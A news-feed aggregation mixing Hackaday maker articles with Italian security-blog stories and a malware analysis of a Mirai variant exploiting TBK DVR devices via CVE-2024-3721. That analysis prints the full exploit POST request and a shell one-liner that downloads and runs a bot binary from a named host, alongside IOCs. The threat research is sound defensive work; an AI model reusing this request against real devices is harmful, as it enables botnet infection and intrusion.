When Wireless MIDI Has Latency, a Hardwired Solution Saves the Day
[Moby Pixel] wanted to build a fun MIDI controller. In the end, he didn’t build it just once, but twice—with the aim of finding out which microcontroller was most fit for this musical purpose. Pitted against each other? The ESP32 and Raspberry Pi Pico.
The MIDI controller itself is quite fetching. It’s built with a 4 x 4 array of arcade buttons to act as triggers for MIDI notes or events. They’re assembled in a nice wooden case with a lovely graphic wrap on it. The buttons themselves are wired to a microcontroller, which is then responsible for sending MIDI data to other devices.
At this point, the project diverges. Originally, [Moby Pixel] set the device up to work with an ESP32 using wireless MIDI over Bluetooth. However, he soon found a problem. Musical performance is all about timing, and the ESP32 setup was struggling with intermittent latency spikes that would ruin the performance. Enter the Raspberry Pi Pico using MIDI over USB. The hardwired solution eliminated the latency problems and made the controller far more satisfying to use.
There may be solutions to the latency issue with the wireless ESP32 setup, be they in code, hardware configuration, or otherwise. But if you want to play with the most accuracy and the minimum fuss, you’ll probably prefer the hardwired setup.
Latency is a vibe killer in music as we’ve explored previously.
youtube.com/embed/yeVNayMNu6s?…
Printed Focus Control for Pro Style Cinematography
When you watch a movie and see those perfect focus switches or zooms, the chances are you’re not seeing the result of the cameraman or focus operator manually moving the lens controls. Instead, they will have been planned and programmed in advance and executed by a motor. If you take a close look at many lenses you’ll see a ring that’s more than just extra knurling, it’s a gear wheel for this purpose. Want to experiment with this technique without buying professional grade accessories? [l0u0k0e] has you covered with a 3D printable focus zoom motor accessory.
The motor behind it all is a geared stepper motor, and there are a set of printed parts to complete the model. It’s recommended to use PETG, and nylon for the gears, but it would work in PLA with a shorter life. It’s designed to work with the standard 15 mm tube you’ll find on many camera rigs, and while you can write your own Arduino sketches to control it if you wish, we’re given instructions for hooking it up to existing focus drivers. The model is on Printables, should you wish to try.
This is by no means the first focus puller we’ve seen, in fact you can even use LEGO.
Una RCE da 9.9 su Roundcube Webmail è stata rilevata dai ricercatori cinesi
Roundcube Webmail è un client IMAP multilingue basato su browser con un’interfaccia utente simile a quella di un’applicazione. Offre tutte le funzionalità che ci si aspetta da un client di posta elettronica, tra cui supporto MIME, rubrica, gestione delle cartelle, ricerca della posta e controllo ortografico.
Di recente, il Qi’anxin CERT ha rilevato un bug di esecuzione di codice backend di Roundcube Webmail (CVE-2025-49113).
La vulnerabilità consiste in un errore logico nella funzione di deserializzazione personalizzata di Roundcube Webmail durante l’elaborazione di file contenenti delimitatori specifici, consentendo ad aggressori autenticati di attivare la deserializzazione creando nomi di file dannosi, ottenendo così l’esecuzione di comandi da remoto e il controllo completo del server.
Attualmente, i dettagli tecnici e la PoC della vulnerabilità sono stati resi pubblici su Internet. Dato l’ampio impatto della vulnerabilità, si consiglia ai clienti di eseguire un’autoispezione e protezione il prima possibile.
Ambito di influenza
Versioni interessate
- Webmail Roundcube
- Webmail Roundcube
Ricorrenza
Attualmente, il ricercatore di sicurezza del Qi’anxin Threat Intelligence Center ha riprodotto con successo la vulnerabilità di esecuzione del codice in background di Roundcube Webmail (CVE-2025-49113); lo screenshot è il seguente:
Attività interessate
I dati della piattaforma di mappatura degli asset Qi’anxin Eagle Chart mostrano che il numero totale di asset a rischio relativi alla Cina che corrisponde a 57.430 istanze, e il numero totale di IP associati è 7.345. La distribuzione degli asset a rischio globali è la seguente:
Il numero totale di asset a rischio globale associati alla vulnerabilità di esecuzione del codice backend di Roundcube Webmail (CVE-2025-49113) è 1.985.313, mentre il numero totale di IP associati è 224.197. La distribuzione degli asset a rischio globale è la seguente:
Attualmente, la versione ufficiale è disponibile per l’aggiornamento. Si consiglia agli utenti interessati di eseguire l’aggiornamento alla versione più recente. Anche l’Agenzia per la cybersicurezza nazionale ha emesso un avviso in tal senso, riportando la necessita di aggiornare immediatamente le istanze affette dalla clamorosa Remote Code Execution.
L'articolo Una RCE da 9.9 su Roundcube Webmail è stata rilevata dai ricercatori cinesi proviene da il blog della sicurezza informatica.
Nintendo Switch 2: un exploit scoperto al secondo giorno dell’uscita
La console Nintendo Switch 2 è appena uscita e gli hacker hanno già scoperto una vulnerabilità.
Il ricercatore di sicurezza David Buchanan è stato il primo a segnalare un exploit per la console Nintendo che sfrutta un punto debole nella libreria condivisa del dispositivo. Ha dimostrato come la cosiddetta vulnerabilità userland possa essere utilizzata per modificare il comportamento di un programma senza accedere al kernel di sistema, ad esempio per forzare la console a visualizzare una grafica personalizzata sotto forma di una scacchiera.
L’exploit utilizza la tecnica Return-Oriented Programming (ROP) , in cui l’hacker sostituisce l’indirizzo di ritorno in memoria, forzando il programma a eseguire il codice di qualcun altro.
Tuttavia, in questo caso, stiamo parlando solo del livello utente: non sarà possibile ottenere l’accesso root o “hackerare” la console in questo modo. Inoltre, lo stesso Buchanan ha ammesso che una simile dimostrazione non ha alcuna utilità pratica e, in teoria, potrebbe essere semplicemente un video di YouTube, sebbene la comunità degli sviluppatori confermi la realtà della vulnerabilità.
Nintendo è tradizionalmente molto severa riguardo alle modifiche ai propri dispositivi. L’azienda ha già avvertito che potrebbe disabilitare la console se un utente tentasse di modificare i servizi di sistema del proprio account. Il contratto d’uso di Switch 2 vieta inoltre esplicitamente qualsiasi manomissione del software.
Sebbene l’exploit trovato non rappresenti una minaccia, potrebbe esserci una nuova sfida da affrontare: quanto tempo ci vorrà agli hacker per aggirare completamente la protezione e ottenere l’accesso al firmware personalizzato?
E come reagirà Nintendo stessa?
L'articolo Nintendo Switch 2: un exploit scoperto al secondo giorno dell’uscita proviene da il blog della sicurezza informatica.
Attacco invisibile via Google: rubano credenziali con pagine ospitate su Apps Script
I truffatori utilizzano la piattaforma Google Apps Script per ospitare pagine di phishing che sembrano legittime e rubano le credenziali degli utenti. I ricercatori di Cofense hanno lanciato l’allarme per nuovi attacchi. Secondo loro, la finta finestra di login è “progettata con cura e ha l’aspetto di una finestra di login legittima”.
“Gli attacchi utilizzano email camuffate da vari account che contengono un link a pagine web che utilizzano Google Apps Script, una piattaforma di sviluppo integrata con i prodotti Google”, spiegano gli esperti.
“Ospitando una pagina di phishing nell’ambiente attendibile di Google, gli aggressori creano l’illusione che sia autentica. Questo rende più facile indurre gli utenti a fornire informazioni sensibili.”
Google Apps Script è la piattaforma di scripting cloud di Google basata su JavaScript che consente di automatizzare le attività ed estendere le funzionalità dei prodotti Google Workspace come Fogli Google, Documenti Google, Drive, Gmail e Calendar. Gli script vengono eseguiti nel dominio attendibile di Google (script.google.com), che è presente nell’elenco degli indirizzi consentiti nella maggior parte delle soluzioni di sicurezza.
Gli aggressori sfruttano Google Apps Script creando script che visualizzano una falsa pagina di accesso che intercetta le credenziali inserite dalle vittime. I dati vengono quindi trasmessi al server degli hacker tramite una richiesta nascosta. Poiché la piattaforma consente a chiunque di pubblicare script come applicazioni web pubbliche e fornisce un dominio Google a tale scopo, gli aggressori possono sfruttarla per evitare sospetti. Inoltre, gli hacker possono modificare da remoto i propri script senza dover inviare nuovamente i link alle vittime, consentendo loro di passare rapidamente da un’esca all’altra.
I ricercatori scrivono che le email di phishing contengono in genere inviti all’azione correlati, ad esempio, al pagamento di bollette o tasse e rimandano a una pagina dannosa ospitata sull’infrastruttura di Google. Dopo che la vittima ha inserito login e password, viene reindirizzata al servizio reale imitato dalla pagina di phishing, per indebolire la vigilanza dell’utente e dare agli aggressori più tempo per utilizzare i dati rubati.
Gli analisti di Cofense concludono che per ora la difesa più efficace contro questo tipo di attacchi è bloccare completamente l’accesso agli URL di Google Apps Script o almeno consigliare di contrassegnarli come potenzialmente pericolosi.
L'articolo Attacco invisibile via Google: rubano credenziali con pagine ospitate su Apps Script proviene da il blog della sicurezza informatica.
3D Pen Used To Build Cleaning Robot That Picks Up Socks
Your average 3D printer is just a nozzle shooting out hot plastic while being moved around by a precise robotic mechanism. There’s nothing stopping you replacing the robot and moving around the plastic-squirting nozzle yourself. That’s precisely what [3D Sanago] did to produce this cute little robot.
The beginning of the video sets the tone. “First we create the base that will become the robot vacuum’s body,” explains [3D Sanago]. “I quickly and precisely make a 15 x 15 cm square almost as if I were a 3D printer.” It’s tedious and tiring to move the 3D printing pen through the motions to build simple parts, but that’s the whole gimmick here. What’s wild is how good the results are. With the right post-processing techniques using an iron, [3D Sanago] is able to produce quite attractive plastic parts that almost justify the huge time investment.
The robot itself works in a fairly straightforward fashion. It’s got four gear motors driving four omniwheels, which let it pan around in all directions with ease. They’re under command of an Arduino Uno paired with a multi-channel motor driver board. The robot also has a servo-controlled arm for moving small objects. The robot lacks autonomy. Instead, [3D Sanago] gave it a wireless module so it could be commanded with a PS4 controller. Despite being referred to as a “robot vacuum,” it’s more of a general “cleaning robot” since it only has an arm to move objects, with no actual vacuum hardware. It’s prime use? Picking up socks.
We’ve seen [3D Sanago]’s fine work before, too. Video after the break.
youtube.com/embed/EAw71MKXW-I?…
The Bellmac-32 CPU — What?
If you have never heard of the Bellmac-32, you aren’t alone. But it is a good bet that most, if not all, of the CPUs in your devices today use technology pioneered by this early 32-bit CPU. The chip was honored with the IEEE Milestone award, and [Willie Jones] explains why in a recent post in Spectrum.
The chip dates from the late 1970s. AT&T’s Bell Labs had a virtual monopoly on phones in the United States, but that was changing, and the government was pressing for divestiture. However, regulators finally allowed Bell to enter the computing market. There was only one problem: everyone else had a huge head start.
There was only one thing to do. There was no point in trying to catch the leaders. Bell decided to leap ahead of the pack. In a time when 8-bit processors were the norm and there were nascent 16-bit processors, they produced a 32-bit processor that ran at a — for the time — snappy 2 MHz.
At the time (1978), most chips used PMOS or NMOS transistors, but Bellmac-32 used CMOS and was made to host compiled C programs. Problems with CMOS were often addressed using dynamic logic, but Bell used a different technique, domino logic, to meet their goals.
Domino logic lets devices cascade like falling dominoes in between clock pulses. By 1980, the device reached 2 MHz, and a second generation could reach speeds of up to 9 MHz. For contrast, the Intel 8088 from 1981 ran at 4.77 MHz and handled, at most, half the data in a given time period as the Bellmac-32. Of course, the 68000 was out a year earlier, but you could argue it was a 16-bit CPU, despite some 32-bit features.
It is fun to imagine what life would be like today if we had fast 32-bit Unix machines widely available in the early 1980s. History has shown that many of Bellmac’s decisions were correct. CMOS was the future. Many of the design and testing techniques would go on to become standard operating procedure across the industry. But, as for the Bellmac-32, it didn’t really get the attention it deserved. It did go on in the AT&T 3B computers as the WE 32×00 family of CPUs.
You can check out a 1982 promo video about the CPU below, which also explains domino logic. Instruction sets have changed a bit since then. You can see a 68000 and 8086 face off, and imagine how the Bellmac would have done in comparison.
youtube.com/embed/JnSS5qI3Cwo?…
Freeze-drying for improved metal printing
For all the remarkable improvements we’ve seen in desktop 3D printers, metal printers have tended to stay out of reach for hackers, mostly because they usually rely on precise and expensive laser systems. This makes it all the more refreshing to see [Dan Gelbart]’s demonstration of Rapidia’s cast-to-sinter method, which goes from SLA prints to ceramic or metal models.
The process began by printing the model in resin, scaled up by 19% to account for shrinkage. [Dan] then used the resin print to make a mold out of silicone rubber, after first painting the model to keep chemicals from the resin from inhibiting the silicone’s polymerization. Once the silicone had set, he cut the original model out of the mold and prepared the mold for pouring. He made a slurry out of metal powder and a water-based binder and poured this into the mold, then froze the mold and its contents at -40 ℃. The resulting mixture of metal powder and ice forms a composite much stronger than pure ice, from which [Dan] was able to forcefully peel back the silicone mold without damaging the part. Next, the still-frozen part was freeze-dried for twenty hours, then finally treated in a vacuum sintering oven for twelve hours to make the final part. The video below the break shows the process.
A significant advantage of this method is that it can produce parts with much higher resolution and better surface finish than other methods. The silicone mold is precise enough that the final print’s quality is mostly determined by the fineness of the metal powder used, and it’s easy to reach micron-scale resolution. The most expensive part of the process is the vacuum sintering furnace, but [Dan] notes that if you only want ceramic and not metal parts, a much cheaper ceramic sintering oven will work better.
We’ve seen sintering-based metal printers a few times before, as well a few more esoteric methods. We’ve also covered a few of [Dan]’s previous videos on mechanical prototyping methods and building a precision CNC lathe.
youtube.com/embed/kLgPW2672s4?…
Thanks to [Eric R Mockler] for the tip!
A Flip Clock Becomes a Flip Timer
Sometimes it’s nice to have a widget to do a single task and avoid getting distracted by the supposed simplicity of doing it with an app on a smartphone. [Dina Amin] built a timer from an old flip clock to stay focused.
Starting with a disassembly of the flip clocks she found at a flea market with [Simone Giertz], [Amin] decided to change the twenty four hour mechanism to a twenty four minute one which was similar to the amount of time she was already using for several different practices. Since she’s an expert in animation, she planned on turning a set of CT scans into the animation that would play on the section that had previously been the minutes of the clock.
As much of the original clock’s components were damaged, and [Amin] didn’t have a chance to learn clockmaking from scratch in a week, she tried a few different drive mechanisms for the build. The drum from an air fryer timer driven with an electric motor fit the bill, but off enough from proper minutes that [Amin] switched from numerals to a yellow circle that fills in as it approaches the satisfying ding of completion.
If you want to see Simone’s Moon flip clock we’ve covered that project too.
youtube.com/embed/JCh1N5dAVxI?…
A Network Status Panel The Way It Should Be
Sometimes a project forms itself around a component rather than an idea, and thus it was that [Maximilien] found himself building a data rate monitor for the connection between two data centers. Some MD0657C2-R LED dot matrix displays for not a lot needed a project.
The displays are mounted in groups of four on small PCBs, driven by a MAX6952, which are then controlled by a Pi Pico. There are several display panels in the project, each of which is a pained and laser-etched acrylic sheet with a pair of the LED boards mounted behind it. These in turn go on the front of a wooden enclosure, with a set of LED ring lights behind to illuminate the etched parts of the panels. Each display panel has its own Pico, daisy chained together and driven by a Pico W that supplies network connectivity.
As you might expect, this isn’t the first status panel we’ve brought you over the years.
Hackaday Podcast Episode 324: Ribbon Microphone From A Gumstick, Texture From a Virtual Log, and a Robot Arm From PVC
This week, Hackaday’s Elliot Williams and Kristina Panos joined forces to bring you the latest news, mystery sound, and of course, a big bunch of hacks from the previous week.
In Hackaday news, the 2025 Pet Hacks Contest rolls on, but only for a short time longer. You have until Tuesday, June 10th to show us what you’ve got, so head over to Hackaday.IO and get started now! In other news, check out what adaptive optics can do when it comes to capturing pictures of the Sun. In other, other news, there won’t be a Podcast next week as Elliot is on vacation.
On What’s That Sound, Kristina failed once again, but four of you guessed correctly. Congratulations to [ToyoKogyo12aTurbo] who fared better and wins a limited edition Hackaday Podcast t-shirt!
After that, it’s on to the hacks and such, beginning with a largely-printed 6-DOF robot arm. We take a look at a bunch of awesome 3D prints like guitars and skateboards, take a look at some pet hacks, and discuss brick layers in orcaslicer. Finally, we talk a lot about keyboards, especially the quickly-evaporating Blackberry keyboards and why they’re disappearing.
Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!
html5-player.libsyn.com/embed/…
Download in DRM-free MP3 and savor at your leisure.
Where to Follow Hackaday Podcast
Places to follow Hackaday podcasts:
Episode 324 Show Notes:
News:
What’s that Sound?
- Congratulations to [ToyoKogyo12aTurbo] for knowing it was the ping of modern active sonar!
Interesting Hacks of the Week:
- Simulation And Motion Planning For 6DOF Robotic Arm
- 2025 Pet Hacks Contest: Keep The Prey At Bay With The Cat Valve
- Testing Brick Layers In OrcaSlicer With Staggered Perimeters
- You Can Make Your Own Ribbon Mic With A Gum Wrapper
- Add Wood Grain Texture To 3D Prints – With A Model Of A Log
- Adding Texture To 3D Prints
- Fuzzy Skin Finish For 3D Prints, Now On Top Layers
- Texturing 3D prints in IdeaMaker for Strength — CNC Kitchen
- You Wouldn’t Download A Skateboard?
Quick Hacks:
- Elliot’s Picks:
- Ender 3 Pro Gets A Second Job As A Stator Winder
- Open Source Watch Movement Really Ticks All The Boxes
- Passive Saturation Box Is A Cheap Way To Distort Your Sound
- Can We Replace A Program Counter With A Linear-Feedback Shift Register? Yes We Can!
- Kristina’s Picks:
- 2025 Pet Hacks Contest: Weigh Your Dog The Easy Way
- 3D Printing A Modular Guitar Means It Can Look Like Whatever You Want
- A CRT Display For Retro Weather Forecasting
Can’t-Miss Articles:
- The Blackberry Keyboard: How An Open-Source Ecosystem Sprouts
- Keebin’ With Kristina: The One With The H.R. Giger Keyboard
hackaday.com/2025/06/06/hackad…
Solder Stencil Done Three Ways
This project, sent in by [Henk], goes through a few different ways to make a solder stencil using a vinyl cutter, a CO2 laser, and a fiber laser.
The project starts with identifying a method to convert the board’s Gerber files to a PNG, which is ultimately used to create a vector file for use with the laser. The first stencil, made with the CO2 laser, was cut out of masking tape. This worked fine for larger cutouts and is certainly a cheap option if you don’t have too many small components. A slightly better approach with the CO2 laser was using vinyl sheet release paper, which seemed to hold together better than the tape.Laser-cut masking tape works, but not for long.
A vinyl cutter was also used as an experiment, but it didn’t perform as well as the CO2 laser, as expected, since the cutter uses a knife rather than light, leading to some tearing issues.
The final method utilized a fiber laser and an empty drink can to create a metal stencil. First, the can had to be cut open, heated, and flattened. The fiber laser was able to cut clean footprints in the aluminum, creating a stencil that would hold up to more use than the paper variations.
The finale of this exploration into laser stencil making was using the fiber laser to solder the board together. The stencil was used to spread paste on the pads, parts were placed on the board, and then the fiber laser heated the solder paste to solder them to the board. The board looked a bit toasty afterwards, but we imagine the process could be fine-tuned to reduce the collateral damage a bit.
Once you’ve got your stencil ready to go, you can combine it with a 3D printed jig to hold the PCB while you apply the solder paste.
In Film, What’s Old May Still Be New Again
We recently published an affectionate look at a Polaroid Land camera, whose peel-apart instant film is long out of production except for a very few single exposure packs form a boutique manufacturer. All that was left was a discussion of modifying it for conventional roll film, or perhaps hacking a modern back-to-front Polaroid sheet into it.
Never say never though, because along come the Chinese company Light Lens Lab with a short announcement at the end of a post talking about grain structures and anti-halation layer materials for their black and white film.
Lastly, with our future development plan, we are currently developing and researching instant peel-apart film, with plans on producing and making available black and white peel-apart film by 2025 in various format. We aim to have an update on our packaging and test shot for the next development/research progress installment. We are also researching, developing and producing colour reversal films that consist of a dye-incorporating development process, commonly known as K-14, for 135 and 120 formats in 2026.
So there you go, no sooner has Hackaday declared a format unavailable, than it shows every sign of reappearing. At this point we’d like to take the opportunity to report that McDonalds Szechuan Chicken McNugget sauce will never ever be available again.
So what does this mean? First of all, assuming that the stuff doesn’t need the GDP of a small country to buy in Europe, the Hackaday Polaroid 104 will be able to shoot in its native format again. But perhaps more interestingly, it opens up a new option for the camera hacker. Pack film is much easier than modern instant film to deal with; it requires only rollers and someone to tug on that paper tab, no gears or motors involved. We’re here for this.
The observant will also have noted at the end of the announcement, mention of a dye-incorporating development process. This refers to the colour chemistry seen in Kodachrome, a long-extinct single-layer film that offered legendarily sharp and vibrant-coloured pictures at the expense of a very complex development path. We’d love to see it, but we’ll take the instant pack film and run.
The Hackaday Land camera is here.
Analysis of the latest Mirai wave exploiting TBK DVR devices with CVE-2024-3721
The abuse of known security flaws to deploy bots on vulnerable systems is a widely recognized problem. Many automated bots constantly search the web for known vulnerabilities in servers and devices connected to the internet, especially those running popular services. These bots often carry Remote Code Execution (RCE) exploits targeting HTTP services, allowing attackers to embed Linux commands within GET or POST requests.
We recently observed the use of CVE-2024-3721 in attempts to deploy a bot in one of our honeypot services. This bot variant turned out to be part of the infamous Mirai botnet, targeting DVR-based monitoring systems. DVR devices are designed to record data from cameras, widely used by many manufacturers and can be managed remotely. In this article, we describe the new Mirai bot features and its revamped infection vector.
Exploitation
During a review of the logs in our Linux honeypot system, we noticed an unusual request line linked to a CVE-2024-3721. This vulnerability allows for the execution of system commands on TBK DVR devices without proper authorization as an entry point, using a specific POST request:
"POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 200 1671 "-" "Mozila/5.0"
The POST request contains a malicious command that is a single-line shell script which downloads and executes an ARM32 binary on the compromised machine.
cd /tmp; rm arm7; wget 42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk
Typically, bot infections involve shell scripts that initially survey the target machine to determine its architecture and select the corresponding binary. However, in this case, since the attack is specifically targeted at devices that only support ARM32 binaries, the reconnaissance stage is unnecessary.
Malware implant – Mirai variant
The source code of the Mirai botnet was published on the internet nearly a decade ago, and since then, it has been adapted and modified by various cybercriminal groups to create large-scale botnets mostly focused on DDoS and resource hijacking.
The DVR bot is also based on the Mirai source code but it includes different features as well, such as string encryption using RC4, anti-VM checks, and anti-emulation techniques. We’ve already covered Mirai in many posts, so we’ll focus on the new features of this specific variant.
Data decryption
The data decryption routine in this variant is implemented as a simple RC4 algorithm.
The RC4 key is encrypted with XOR. After the key decryption, we were able to obtain its value: 6e7976666525a97639777d2d7f303177
.
The decrypted RC4 key is used to decrypt the strings. After each piece of data is decrypted, it is inserted into a vector of a custom DataDecrypted
structure, which is a simple string list:
The global linked list with decrypted data is accessed whenever the malware needs particular strings.
Adding decrypted strings to the global list
Anti-VM and anti-emulation
To detect if it is currently running inside a virtual machine or QEMU, the malware lists all processes until it finds any mention of VMware or QEMU-arm. Listing running processes is simply a matter of opening the /proc
directory, which is the proc filesystem on Linux.
Each process ID (PID) has its own folder containing useful information, such as cmdline
, which describes the command used to start the process. Using this information, the malware verifies if there are any processes with VMware
or QEMU-arm
in their command line.
The implant also verifies if the bot process is running outside an expected directory, based on a hardcoded list of allowed ones:
Once those checks are successfully completed, Mirai will continue normal execution, preparing the vulnerable device for receiving commands from the operator.
Infection statistics
According to our telemetry data, the majority of infected victims are located in countries such as China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. It’s challenging to ascertain the exact number of vulnerable and infected devices globally. However, by analyzing public sources, we’ve identified over 50,000 exposed DVR devices online, indicating that attackers have numerous opportunities to target unpatched, vulnerable devices.
Conclusion
Exploiting known security flaws in IoT devices and servers that haven’t been patched, along with the widespread use of malware targeting Linux-based systems, leads to a significant number of bots constantly searching the internet for devices to infect.
The main goal of such bots is to carry out attacks that overwhelm websites and services (DDoS attacks). Most of these bots don’t stay active after the device restarts because some device firmware doesn’t allow changes to the file system. To protect against infections like these, we recommend updating vulnerable devices as soon as security patches become available. Another thing to consider is a factory reset if your device is indeed vulnerable and exposed.
All Kaspersky products detect the threat as HEUR:Backdoor.Linux.Mirai
and HEUR:Backdoor.Linux.Gafgyt
.
Indicators of compromise
Host-based (MD5 hashes)
011a406e89e603e93640b10325ebbdc8
24fd043f9175680d0c061b28a2801dfc
29b83f0aae7ed38d27ea37d26f3c9117
2e9920b21df472b4dd1e8db4863720bf
3120a5920f8ff70ec6c5a45d7bf2acc8
3c2f6175894bee698c61c6ce76ff9674
45a41ce9f4d8bb2592e8450a1de95dcc
524a57c8c595d9d4cd364612fe2f057c
74dee23eaa98e2e8a7fc355f06a11d97
761909a234ee4f1d856267abe30a3935
7eb3d72fa7d730d3dbca4df34fe26274
8a3e1176cb160fb42357fa3f46f0cbde
8d92e79b7940f0ac5b01bbb77737ca6c
95eaa3fa47a609ceefa24e8c7787bd99
96ee8cc2edc8227a640cef77d4a24e83
aaf34c27edfc3531cf1cf2f2e9a9c45b
ba32f4eef7de6bae9507a63bde1a43aa
IPs
116.203.104[.]203
130.61.64[.]122
161.97.219[.]84
130.61.69[.]123
185.84.81[.]194
54.36.111[.]116
192.3.165[.]37
162.243.19[.]47
63.231.92[.]27
80.152.203[.]134
42.112.26[.]36
Soviet Calculator Teardown Reveals Similarities And Differences
Tearing down hardware from different parts of the world can be revealing, showing unique parts, techniques, and tricks employed by engineers living in a very different world from our own. To that end, [msylvain59] has been kind enough to give us a look inside the Elektronika MK-26—a calculator built in the former Soviet Union.
There’s lots of interesting stuff to see from the get-go. The oddball button pad is covered in Cyrillic symbols, quite alien to those of us more accustomed to the Latin character set. It’s also constructed somewhat unlike more familiar models from Western-aligned companies like Casio or Commodore. It also rattles when shaken, which doesn’t inspire confidence. Inside, it’s got old-school brown PCBs without the usual green solder mask, a chunky IC in a weird package, and display is via a power-hungry VFD.
It doesn’t look so totally alien inside; much of the construction is pretty typical of the mid-1970s, wherever you went around the world. The most striking differences are more in the graphics and visual design than anything else.
Ultimately, there are reasons why manufacturers around the world tend to converge on similar techniques. Generally, it’s because it’s more economical or easier to do things a certain way. And yet, we still see regional variances because conditions, technologies, and parts availability varies around the world. This teardown highlights that quite clearly.
If you’re just getting a taste for Soviet hardware teardowns, you’ll love this video diving inside a real Soyuz clock.
youtube.com/embed/N2kkGV5aBs8?…
GhostSec: Azienda Italiana Commissiona Attacco Informatico Al Governo Macedone
GhostSec, noto collettivo di hacktivisti, ha recentemente rivelato dettagli su un’operazione controversa che coinvolge un’azienda italiana e obiettivi governativi macedoni.
In un’intervista esclusiva con DeepDarkCTI, il fondatore Sebastian Dante Alexander ha condiviso informazioni su questa collaborazione e le sue implicazioni.
Una collaborazione controversa
Secondo quanto riportato, un’azienda italiana, ufficialmente privata ma presumibilmente legata ai servizi segreti italiani, avrebbe incaricato GhostSec di condurre operazioni offensive contro obiettivi governativi in Macedonia del Nord. Successivamente, la stessa azienda avrebbe richiesto attacchi contro un’entità in Sardegna, indicata come una società rivale.
La comunicazione tra le parti è avvenuta tramite canali criptati, con l’azienda italiana che ha contattato direttamente GhostSec. Tuttavia, dopo l’esecuzione delle operazioni, l’azienda avrebbe interrotto i contatti e non avrebbe effettuato il pagamento concordato.
La risposta di GhostSec
In risposta al mancato pagamento, GhostSec ha minacciato di rendere pubbliche le comunicazioni e i dettagli delle operazioni svolte. Alexander ha dichiarato che l’esposizione delle informazioni non solo metterebbe in imbarazzo l’azienda italiana, ma potrebbe anche avere ripercussioni sul governo macedone.
Nonostante le implicazioni legali, GhostSec sembra determinato a procedere con la divulgazione, a meno che non venga raggiunto un accordo con l’azienda coinvolta.
Implicazioni e riflessioni
Questo caso solleva interrogativi significativi sull’etica delle operazioni di hacktivismo e sulle collaborazioni tra entità private e gruppi di hacker. La facilità con cui un’azienda può commissionare attacchi informatici contro governi stranieri evidenzia quanto può essere difficile una regolamentazione più stringente nel cyberspazio dove è possibile raggiungere un’alta forma di anonimato.
Per ulteriori dettagli sull’intervista e le dichiarazioni complete di Sebastian Dante Alexander, è possibile consultare l’articolo originale su DeepDarkCTI.
Chi è GhostSec
GhostSec è un collettivo di hacker emerso nel 2015 come diramazione del movimento Anonymous, guadagnando notorietà per le sue operazioni contro l’ISIS nell’ambito della campagna #OpISIS. Inizialmente motivato da ideali di giustizia sociale e lotta al terrorismo, il gruppo ha subito una trasformazione significativa nel corso degli anni.
Una frattura interna ha portato alla formazione di due entità distinte: da un lato, il “Ghost Security Group“, che ha scelto di collaborare con agenzie governative per contrastare il terrorismo; dall’altro, i membri rimasti sotto il nome di GhostSec, che hanno progressivamente orientato le loro attività verso obiettivi finanziari. Questo cambiamento è evidenziato dal lancio di “GhostSec Mafia Premium”, un canale Telegram a pagamento che offre contenuti esclusivi come fughe di dati e tutorial di hacking. La frase “Hacktivism does not pay the bills!” (L’hacktivismo non paga le bollette) sintetizza questa nuova direzione.
Nel 2023, GhostSec ha introdotto GhostLocker, una piattaforma di Ransomware-as-a-Service (RaaS) che consente agli affiliati di lanciare attacchi ransomware condividendo i profitti con il gruppo. La versione più recente, GhostLocker 2.0, scritta in Go, offre funzionalità avanzate come crittografia AES a 128 bit, opzioni di persistenza e un pannello di controllo per gli affiliati. In collaborazione con il gruppo Stormous, GhostSec ha lanciato il programma STMX_GhostLocker, ampliando ulteriormente la portata delle sue operazioni.
Nonostante una dichiarazione nel maggio 2024 in cui affermava di voler cessare le attività criminali e tornare all’hacktivismo, le azioni recenti del gruppo suggeriscono una continua evoluzione verso il cybercrime organizzato. GhostSec è attualmente associato a collettivi come ThreatSec, Stormous, BlackForums e SiegedSec, formando una rete nota come “The Five Families”.
Conclusioni
Il caso GhostSec–azienda italiana rappresenta un inquietante esempio di come i confini tra attivismo, intelligence privata e criminalità informatica siano oggi sempre più sfumati. Un gruppo nato con finalità ideologiche si ritrova al centro di un presunto contratto per operazioni offensive contro obiettivi governativi stranieri — un contesto che richiama più un’operazione sotto false flag che una campagna di hacktivismo tradizionale.
Tuttavia, l’assenza di prove concrete, l’anonimato delle parti coinvolte e la mancanza di verifica indipendente impongono massima cautela: non è ancora possibile stabilire con certezza quanto ci sia di vero nel racconto fornito da GhostSec. Ciò non toglie che simili dichiarazioni, anche solo a livello di minaccia, abbiano un impatto significativo: mettono in allerta istituzioni, aziende e opinione pubblica sulla crescente professionalizzazione del crimine informatico e sull’emergere di una nuova zona grigia dove hacker, contractor e interessi geopolitici si intrecciano.
In questo scenario, la Cyber Threat Intelligence (CTI) diventa uno strumento cruciale: monitorare, analizzare e anticipare questi fenomeni consente non solo di prevenire attacchi informatici, ma anche di identificare tempestivamente le reti opache di collaborazione tra attori privati e cybercriminali. Solo attraverso un’attività costante di intelligence è possibile neutralizzare le minacce prima che si traducano in danni concreti.
Resta da vedere se GhostSec pubblicherà davvero le prove promesse, se emergerà l’identità dell’azienda coinvolta o se l’intera vicenda svanirà nell’ombra, come molte altre nel dark web. In ogni caso, questo episodio è un campanello d’allarme che non può essere ignorato.
L'articolo GhostSec: Azienda Italiana Commissiona Attacco Informatico Al Governo Macedone proviene da il blog della sicurezza informatica.
Fan di Star Wars o spie della CIA? Ecco cosa ha scoperto un ricercatore brasiliano
404 Media e il ricercatore indipendente Ciro Santilli hanno scoperto dei siti web insoliti creati e gestiti dalla CIA. Per comunicare con gli informatori sono stati utilizzati un sito di fan di Star Wars, un sito sugli sport estremi e un sito sulla musica brasiliana.
Santilli ha affermato di essere stato attratto dallo studio della rete della Central Intelligence Agency (CIA) per una serie di ragioni, tra cui il suo interesse per la politica cinese, il suo amore per gli adattamenti televisivi dei romanzi di spionaggio e “il desiderio di vendicarsi della CIA per aver spiato altri paesi democratici” (Santilli è brasiliano). Inoltre, il ricercatore riteneva di essere qualificato per condurre tale ricerca, data la sua esperienza nello sviluppo web e in Linux. Scherza anche dicendo che, ovviamente, lui voleva “fama e fortuna”.
